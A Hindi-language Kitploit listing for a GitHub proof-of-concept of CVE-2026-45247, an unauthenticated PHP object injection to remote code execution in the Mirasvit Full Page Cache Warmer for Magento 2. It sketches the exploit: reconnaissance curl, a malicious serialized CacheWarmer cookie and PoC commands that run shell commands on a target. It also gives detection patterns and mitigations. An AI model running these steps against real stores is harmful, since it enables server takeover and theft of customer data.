Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE- — कार्यात्मक PoC CVE-2026-45247: Mirasvit Full Page Cache (Magento 2) में बिना प्रमाणीकरण के PHP Object Injection से RCE। | Kitploit
उपकरण/GitHubGitHub/fevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubfevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-

PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE-

कार्यात्मक PoC CVE-2026-45247: Mirasvit Full Page Cache (Magento 2) में बिना प्रमाणीकरण के PHP Object Injection से RCE।

रिपॉजिटरी देखें
13 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-45247 - Magento 2 के लिए Mirasvit Full Page Cache Warmer - PHP ऑब्जेक्ट इंजेक्शन → RCE

CVE-2026-45247 CVSS CISA KEV

📋 विवरण

CVE-2026-45247 Magento 2 और Adobe Commerce के लिए Mirasvit Full Page Cache Warmer एक्सटेंशन में एक गंभीर PHP ऑब्जेक्ट इंजेक्शन भेद्यता है। एक अप्रमाणित हमलावर CacheWarmer कुकी में एक हेरफेर किए गए सीरियलाइज़्ड PHP ऑब्जेक्ट भेजकर रिमोट कोड निष्पादन (RCE) प्राप्त कर सकता है।

यह भेद्यता PHP के मूल unserialize() फ़ंक्शन के अप्रतिबंधित कॉल में निहित है, जो Magento और उसकी निर्भरताओं (विशेष रूप से Monolog) में उपलब्ध गैजेट श्रृंखलाओं (gadget chains) के साथ संयुक्त है।

गुणमान
CVECVE-2026-45247
उत्पादMagento 2 के लिए Mirasvit Full Page Cache Warmer
प्रभावित संस्करण1.11.12 से पहले के सभी संस्करण
उपलब्ध पैचसंस्करण 1.11.12 (25 मई 2026)
CVSS स्कोर9.8 (गंभीर)
वेक्टरAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CISA KEV में स्थितिसक्रिय शोषण की पुष्टि (03/06/2026 को जोड़ा गया)
अंतिम तिथि06/06/2026

🚨 हमला तंत्र

  1. एक्सटेंशन CacheWarmer कुकी को हर स्टोर अनुरोध पर प्रोसेस करता है
  2. कुकी का मान बिना सैनिटाइज़ेशन के unserialize() को पास किया जाता है
  3. एक हमलावर एक दुर्भावनापूर्ण सीरियलाइज़्ड PHP ऑब्जेक्ट भेजता है
  4. Monolog की गैजेट श्रृंखलाओं (SyslogUdpHandler, BufferHandler, FingersCrossedHandler) का उपयोग करके RCE प्राप्त किया जाता है
  5. कमांड वेब सेवा के विशेषाधिकारों के साथ सर्वर पर निष्पादित किया जाता है

⚙️ हमले के चरण

चरण 1: पहचान

root@kitploit:~
# जाँच करें कि स्टोर Mirasvit Cache Warmer का उपयोग करता है या नहीं
curl -s https://tienda.com/pub/media/mirasvit/cache_warmer/CHANGELOG.md

चरण 2: भेद्यता विश्लेषण

root@kitploit:~
# कुकी बिना प्रमाणीकरण के प्रत्येक अनुरोध पर प्रोसेस की जाती है
# Mirasvit में भेद्य कोड:
$cookieValue = $_COOKIE['CacheWarmer'];
$data = unserialize(base64_decode($cookieValue));  # खतरा!

चरण 3: एक्सप्लॉइट का निष्पादन

root@kitploit:~
# दुर्भावनापूर्ण कुकी का निर्माण
payload = serialize(PHPObjectInjection())
cookie_value = f"CacheWarmer:{base64_encode(payload)}"

# अनुरोध भेजना
requests.get(target, cookies={'CacheWarmer': cookie_value})

🛠️ PoC का उपयोग

स्थापना

root@kitploit:~
git clone https://github.com/tu-usuario/CVE-2026-45247.git
cd CVE-2026-45247
pip install requests

बुनियादी निष्पादन

root@kitploit:~
# भेद्यता की जाँच करें
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com --check-only

# 'id' कमांड निष्पादित करें
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "id"

# कस्टम कमांड निष्पादित करें
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "whoami"

# डिबगिंग के लिए प्रॉक्सी का उपयोग करें
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "ls -la" --proxy http://127.0.0.1:8080

त्वरित स्क्रिप्ट

root@kitploit:~
# bash स्क्रिप्ट से जाँच करें
chmod +x check_cve_2026_45247.sh
./check_cve_2026_45247.sh https://tienda.ejemplo.com

📊 प्रदर्शित प्रभाव

  • Magento सर्वर पर रिमोट कमांड निष्पादन (RCE)
  • ग्राहकों और ऑर्डर डेटाबेस तक पूर्ण पहुंच
  • स्थायित्व के लिए वेबशेल की स्थापना
  • ऑनलाइन स्टोर का पूर्ण समझौता
  • क्रेडिट कार्ड डेटा का संभावित रिसाव
  • कॉर्पोरेट बुनियादी ढांचे में पार्श्व आंदोलन

🛡️ पहचान

समझौता संकेतक (IOCs)

एक्सेस लॉग में:

root@kitploit:~
CacheWarmer: (Tz|Qz|YT)[a-zA-Z0-9+/=]+

शोषण में देखे गए कमांड:

root@kitploit:~
echo PWNED_CVE2026_$(date +%s)
sleep 5

उपयोग की गई गैजेट श्रृंखलाएँ:

  • Monolog\Handler\SyslogUdpHandler
  • Monolog\Handler\BufferHandler
  • Monolog\Handler\FingersCrossedHandler
  • Monolog\Handler\GroupHandler

🔧 शमन

तत्काल अद्यतन

root@kitploit:~
# पैच संस्करण में अद्यतन करें
composer require mirasvit/module-cache-warmer:1.11.12
bin/magento cache:flush

अस्थायी शमन

root@kitploit:~
# .htaccess या nginx में CacheWarmer कुकी को ब्लॉक करें
RewriteCond %{HTTP_COOKIE} CacheWarmer
RewriteRule .* - [F,L]
root@kitploit:~
// app/code/local/Custom/BlockCookie.php में
if (isset($_COOKIE['CacheWarmer'])) {
    unset($_COOKIE['CacheWarmer']);
}
टूल डाउनलोड करें